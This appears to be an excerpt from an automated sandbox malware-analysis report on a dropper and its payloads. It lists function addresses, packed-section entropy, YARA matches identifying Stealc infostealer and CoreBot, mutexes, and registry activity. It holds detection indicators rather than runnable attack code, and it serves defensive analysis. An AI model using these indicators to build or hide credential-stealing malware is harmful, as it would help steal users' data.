                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C47CA702_2_6C47CA70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4AEA002_2_6C4AEA00
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B8A302_2_6C4B8A30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C47EA802_2_6C47EA80
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C506BE02_2_6C506BE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4A0BA02_2_6C4A0BA0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4184602_2_6C418460
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4644202_2_6C464420
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C48A4302_2_6C48A430
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4464D02_2_6C4464D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C49A4D02_2_6C49A4D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C52A4802_2_6C52A480
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5485502_2_6C548550
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4585402_2_6C458540
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5045402_2_6C504540
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4625602_2_6C462560
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4A05702_2_6C4A0570
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F45B02_2_6C3F45B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CA5E02_2_6C4CA5E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C48E5F02_2_6C48E5F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45C6502_2_6C45C650
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4246D02_2_6C4246D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45E6E02_2_6C45E6E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C49E6E02_2_6C49E6E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4807002_2_6C480700
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C42A7D02_2_6C42A7D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C44E0702_2_6C44E070
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CC0002_2_6C4CC000
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C80102_2_6C4C8010
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F80902_2_6C3F8090
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4100B02_2_6C4100B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DC0B02_2_6C4DC0B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4681402_2_6C468140
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4761302_2_6C476130
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E41302_2_6C4E4130
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4001E02_2_6C4001E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4982502_2_6C498250
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4882602_2_6C488260
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CA2102_2_6C4CA210
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D82202_2_6C4D8220
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5862C02_2_6C5862C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D22A02_2_6C4D22A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CE2B02_2_6C4CE2B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4083402_2_6C408340
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5423702_2_6C542370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4023702_2_6C402370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C51C3602_2_6C51C360
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4963702_2_6C496370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4723202_2_6C472320
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4543E02_2_6C4543E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4323A02_2_6C4323A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45E3B02_2_6C45E3B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C403C402_2_6C403C40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C529C402_2_6C529C40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C411C302_2_6C411C30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53DCD02_2_6C53DCD0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C1CE02_2_6C4C1CE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C463D002_2_6C463D00
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D1DC02_2_6C4D1DC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F3D802_2_6C3F3D80
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C549D902_2_6C549D90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C55BE702_2_6C55BE70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C585E602_2_6C585E60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C50DE102_2_6C50DE10
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C423EC02_2_6C423EC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F5F302_2_6C3F5F30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C435F202_2_6C435F20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C557F202_2_6C557F20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C51DFC02_2_6C51DFC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C583FC02_2_6C583FC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4ABFF02_2_6C4ABFF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C421F902_2_6C421F90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45D8102_2_6C45D810
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C40D8E02_2_6C40D8E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4338E02_2_6C4338E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C55B8F02_2_6C55B8F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DF8F02_2_6C4DF8F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C47F9602_2_6C47F960
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4BD9602_2_6C4BD960
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C54F9002_2_6C54F900
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B59202_2_6C4B5920
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4999C02_2_6C4999C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4399D02_2_6C4399D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4659F02_2_6C4659F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4979F02_2_6C4979F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4119802_2_6C411980
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D19902_2_6C4D1990
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C589A502_2_6C589A50
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C43FA102_2_6C43FA10
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4FDA302_2_6C4FDA30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C401AE02_2_6C401AE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DDAB02_2_6C4DDAB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DFB602_2_6C4DFB60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C44BB202_2_6C44BB20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C447BF02_2_6C447BF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F1B802_2_6C3F1B80
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E5B902_2_6C4E5B90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C459BA02_2_6C459BA0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C9BB02_2_6C4C9BB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C48D4102_2_6C48D410
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E94302_2_6C4E9430
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4014E02_2_6C4014E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5814A02_2_6C5814A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C54F5102_2_6C54F510
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4675002_2_6C467500
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4155102_2_6C415510
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4855F02_2_6C4855F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4395902_2_6C439590
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4556402_2_6C455640
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4196502_2_6C419650
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4296002_2_6C429600
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4776102_2_6C477610
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00485C835_2_00485C83
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_0048735A5_2_0048735A
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_004C88605_2_004C8860
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00484DE05_2_00484DE0
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00484B305_2_00484B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE88606_2_00FE8860
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4DE06_2_00FA4DE0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4B306_2_00FA4B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FD7F366_2_00FD7F36
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FE88607_2_00FE8860
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA4DE07_2_00FA4DE0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA4B307_2_00FA4B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FD7F367_2_00FD7F36
                                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: String function: 6C423620 appears 95 times
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: String function: 6C429B10 appears 107 times
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: String function: 6C45C5E0 appears 35 times
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: String function: 6C539F30 appears 52 times
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: String function: 004980C0 appears 130 times
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00FB80C0 appears 260 times
                                      Source: random[1].exe.15.drStatic PE information: Data appended to the last section found
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: Data appended to the last section found
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: 5EfYBe3nch.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                                      Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                                      Source: 5EfYBe3nch.exeStatic PE information: Section: ZLIB complexity 0.9998972039473685
                                      Source: 5EfYBe3nch.exeStatic PE information: Section: dalsczsh ZLIB complexity 0.9948622258272617
                                      Source: random[1].exe.15.drStatic PE information: Section: ZLIB complexity 0.9999036287006579
                                      Source: random[1].exe.15.drStatic PE information: Section: cywnalex ZLIB complexity 0.9953611696950032
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: Section: ZLIB complexity 0.9999036287006579
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: Section: cywnalex ZLIB complexity 0.9953611696950032
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: Section: ZLIB complexity 1.00067138671875
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: Section: xuvnqsmj ZLIB complexity 0.994574785670545
                                      Source: iSHmPkn.exe.15.drStatic PE information: Section: ZLIB complexity 1.00067138671875
                                      Source: iSHmPkn.exe.15.drStatic PE information: Section: xuvnqsmj ZLIB complexity 0.994574785670545
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: Section: ZLIB complexity 0.9981477744464945
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: Section: ZLIB complexity 0.99796875
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: Section: .data ZLIB complexity 0.9965319237854804
                                      Source: 10DCQZI.exe.15.dr, Options.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                      Source: 10DCQZI.exe.15.dr, Options.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                      Source: eXbhgU9[1].exe.15.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                      Source: eXbhgU9[1].exe.15.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                      Source: eXbhgU9.exe.15.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                      Source: eXbhgU9.exe.15.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                      Source: 10DCQZI[1].exe.15.dr, Options.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                      Source: 10DCQZI[1].exe.15.dr, Options.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                      Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@128/103@0/23
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C460300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6C460300
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HL3OV0KQ.htmJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeMutant created: \Sessions\1\BaseNamedObjects\4148ce17-5f2b-4314-8b16-31b6a48899e4
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                      Source: DLTDCR8UJINP8YM8Y.exe, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
